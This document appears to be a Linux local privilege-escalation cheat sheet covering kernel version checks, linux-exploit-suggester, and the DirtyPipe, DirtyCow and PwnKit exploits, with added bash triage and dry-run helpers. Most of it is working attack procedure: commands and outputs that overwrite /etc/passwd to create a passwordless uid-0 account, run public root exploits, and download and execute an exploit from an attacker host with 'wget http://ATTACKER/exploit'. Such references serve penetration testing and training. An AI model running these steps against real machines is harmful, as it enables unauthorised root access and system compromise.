KERNEL EXPLOITS

Check kernel version

Exact kernel version — Search for matching exploits

uname -r
Example Output
uname -r
4.15.0-20-generic

Search: 'linux kernel 4.15.0-20 exploit'
Results: DirtyCow and assorted local privesc writeups will come up, but DirtyCow
only covers 2.6.22 - 4.8.3, so it does not apply to 4.15.0-20; read each hit's
affected range before compiling anything
(Match the exact version, including the distro build number after the dash, against
each exploit's range; distros backport fixes, so a kernel inside the upstream range
can still be patched)

linux-exploit-suggester

Automated kernel exploit finder — Suggests matching CVEs

./linux-exploit-suggester.sh
or: ./les.sh
Example Output
./linux-exploit-suggester.sh
[+] CVE-2021-4034 (PwnKit)
  Versions: ALL
  Confidence: Highly probable
[+] CVE-2022-0847 (DirtyPipe)
  Versions: 5.8 - 5.16.11
[+] CVE-2016-5195 (DirtyCow)
  Versions: 2.6.22 - 4.8.3
(Treat the list as candidates, not confirmed holes: the script matches on the
version string and cannot see backported fixes. PwnKit shows "Versions: ALL"
because it is a polkit bug, not a kernel one.)
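The two checks above (exact kernel version, then matching it against known ranges) are easy to get wrong by eye. The script below is an added helper, not code from this cheat sheet and not linux-exploit-suggester: it parses `uname -r`, tests it against the DirtyCow and DirtyPipe ranges quoted on this page (upper bound taken as the first fixed upstream release), and reports whether a setuid pkexec and a compiler are present. The function names are my own.

```bash
#!/usr/bin/env bash
# Added triage helper, not part of the original cheat sheet and not from
# linux-exploit-suggester. Ranges come from this page; the upper bound is the
# first fixed upstream release, so a hit is a candidate to test, not a confirmed hole.

# kver_num "5.13.0-39-generic" -> 5013000  (major*10^6 + minor*10^3 + patch; distro suffix dropped)
kver_num() {
    local v=${1%%-*} major minor patch rest
    IFS=. read -r major minor patch rest <<EOF
$v
EOF
    echo $(( ${major:-0} * 1000000 + ${minor:-0} * 1000 + ${patch:-0} ))
}

# in_range VERSION LOW HIGH -> 0 when LOW <= VERSION < HIGH (HIGH = first fixed release)
in_range() {
    local v lo hi
    v=$(kver_num "$1"); lo=$(kver_num "$2"); hi=$(kver_num "$3")
    if [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]; then return 0; else return 1; fi
}

# candidates VERSION -> one line per kernel bug on this page whose upstream range covers VERSION
candidates() {
    in_range "$1" 2.6.22 4.8.3   && echo "CVE-2016-5195 DirtyCow (2.6.22 - 4.8.3)"
    in_range "$1" 5.8    5.16.11 && echo "CVE-2022-0847 DirtyPipe (5.8 - 5.16.11)"
    return 0
}

# pkexec_setuid -> 0 if pkexec exists and carries the setuid bit (precondition for PwnKit)
pkexec_setuid() {
    local p
    p=$(command -v pkexec 2>/dev/null) || return 1
    [ -u "$p" ]
}

# triage KERNEL ARCH -> the summary an operator wants before picking an exploit
triage() {
    local kv=$1 arch=$2
    echo "kernel: $kv  arch: $arch"
    candidates "$kv" | sed 's/^/  candidate: /'
    if pkexec_setuid; then
        echo "  candidate: CVE-2021-4034 PwnKit (setuid pkexec present; kernel version irrelevant)"
    fi
    if command -v gcc >/dev/null 2>&1; then
        echo "  gcc on target: yes (compile here)"
    else
        echo "  gcc on target: no (cross-compile with -static for $arch)"
    fi
}

triage "$(uname -r)" "$(uname -m)"
```

Run it as-is on the target; the version arithmetic deliberately ignores the distro build suffix, which is exactly the part you then have to check by hand against the distro advisory.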

DirtyPipe (CVE-2022-0847)

Overwrite read-only files — Very reliable (page-cache write, no race to win)

Kernel 5.8 up to the fix in 5.16.11 (also fixed in 5.15.25 and 5.10.102)
PoC limits: same-length in-place write only, cannot start at byte 0 of a page,
cannot cross a page boundary, cannot enlarge the file
Example Output
uname -r: 5.13.0-39-generic (VULNERABLE)

cp /etc/passwd /tmp/passwd.bak
./dirtypipe /etc/passwd 1 'root::0:0:root:/root:/bin/bash'
head -1 /etc/passwd
rroot::0:0:root:/root:/bin/bash
(offset 0 is a page boundary and cannot be written, so offset 1 leaves the first
 byte of the line in place: the uid-0 entry with the empty password is named
 rroot, not root. su the name you actually see.)

su rroot (no password)
# id -u
0
# cp /tmp/passwd.bak /etc/passwd   (restore; the overwrite lives only in the page cache)
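Before running the overwrite it pays to see what the target file will look like afterwards, and whether the write is even allowed under the PoC's rules. The helper below is added here; it is not the page's code and not part of any DirtyPipe PoC. It simulates the same-length write in a string and applies the three refusal conditions (page boundary, crossing a page, enlarging the file). The 4096-byte page size and the two-line passwd sample are assumptions; the sample is constructed, not read from a host.

```bash
#!/usr/bin/env bash
# Added dry-run helper for the DirtyPipe write described above. Not from the page
# and not part of any DirtyPipe PoC: it only simulates the in-place write in a
# string and enforces the PoC's own refusal conditions before you touch a real file.
export LC_ALL=C   # make ${#...} and ${...:off:len} count bytes, not characters
PAGE=4096         # assumption: 4 KiB pages (x86-64 default)

# dp_check OFFSET DATA FILESIZE -> 0 if the write can be performed, else reason on stderr and 1
dp_check() {
    local off=$1 data=$2 size=$3 len=${#2}
    if (( off % PAGE == 0 )); then
        echo "offset $off is a page boundary: the first byte of a page cannot be written" >&2
        return 1
    fi
    if (( PAGE - off % PAGE < len )); then
        echo "$len bytes at offset $off would cross a page boundary" >&2
        return 1
    fi
    if (( off + len > size )); then
        echo "write would end past EOF ($size bytes): the file cannot be enlarged" >&2
        return 1
    fi
    return 0
}

# dp_preview CONTENT OFFSET DATA -> CONTENT with DATA spliced over the bytes at OFFSET (length unchanged)
dp_preview() {
    local content=$1 off=$2 data=$3
    printf '%s' "${content:0:off}${data}${content:off+${#data}}"
}

# Constructed sample standing in for the first two lines of /etc/passwd (not read from a host)
SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin'
DATA='root::0:0:root:/root:/bin/bash'   # the payload used in the cheat sheet

# Effect of the cheat sheet's "offset 1" write: the leading byte survives, so the
# uid-0 entry with the empty password is called "rroot", not "root".
if dp_check 1 "$DATA" "${#SAMPLE}"; then
    dp_preview "$SAMPLE" 1 "$DATA" | head -n 1    # prints: rroot::0:0:root:/root:/bin/bash
fi
```

For a real target, feed `dp_preview` the file's bytes (`"$(cat /etc/passwd)"`) and `dp_check` the size from `stat -c %s`; whatever the preview shows for the following line is what the PoC will leave there too, since the write never shortens or lengthens anything.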

DirtyCow (CVE-2016-5195)

Race condition write to read-only — Older but still seen in labs

Kernel 2.6.22 - 4.8.3 upstream (distros backported the fix, so compare the
build number after the dash with the distro advisory, not only the upstream range)
Example Output
uname -r: 4.4.0-21-generic (VULNERABLE)

gcc -pthread dirty.c -o dirty -lcrypt      (firefart variant: adds a UID 0 user)
./dirty newpassword
(the PoC backs up /etc/passwd to /tmp/passwd.bak and replaces the root line
 with a 'firefart' entry; run it once only, the race can hang or crash the box)

su firefart
Password: newpassword
# id -u
0
(whoami prints firefart, not root: the name lookup for UID 0 now hits that entry)
# mv /tmp/passwd.bak /etc/passwd   (restore, as the PoC itself tells you to)

PwnKit (CVE-2021-4034)

Polkit local privesc — Almost always works if pkexec is setuid and unpatched
(not a kernel bug: memory corruption in the setuid pkexec binary, so the kernel
version does not matter at all)

pkexec on most Linux distros
Example Output
which pkexec && pkexec --version
pkexec version 0.105
ls -l $(which pkexec)
(look for the 's' in -rwsr-xr-x: pkexec must be setuid root for this to matter.
 The version string proves nothing, distros ship 0.105 both patched and unpatched.)

./PwnKit
# whoami
root
(Works on any unpatched polkit build; the bug has been in pkexec since 2009.
 A patched pkexec simply exits. Dropping the setuid bit, chmod 0755 on pkexec,
 is the usual mitigation when patching is not possible.)

Compile on target or cross-compile

Match architecture (x86/x64) — Static compile avoids library issues

uname -m on the target tells you which: x86_64 means -m64, i686 means -m32.
-static avoids glibc version mismatches between attacker and target;
-m32 on an x86_64 attacker needs gcc-multilib installed.

gcc exploit.c -o exploit
or compile on attacker: gcc -static -m32 exploit.c -o exploit
Example Output
On target:
gcc exploit.c -o exploit
./exploit

OR cross-compile on attacker:
gcc -static -m64 exploit.c -o exploit
file exploit                   (expect 'ELF 64-bit' and 'statically linked')
python3 -m http.server 80      (port 80 needs root on the attacker; any port works)

On target:
wget http://ATTACKER/exploit   (or: curl -o exploit http://ATTACKER/exploit)
chmod +x exploit && ./exploit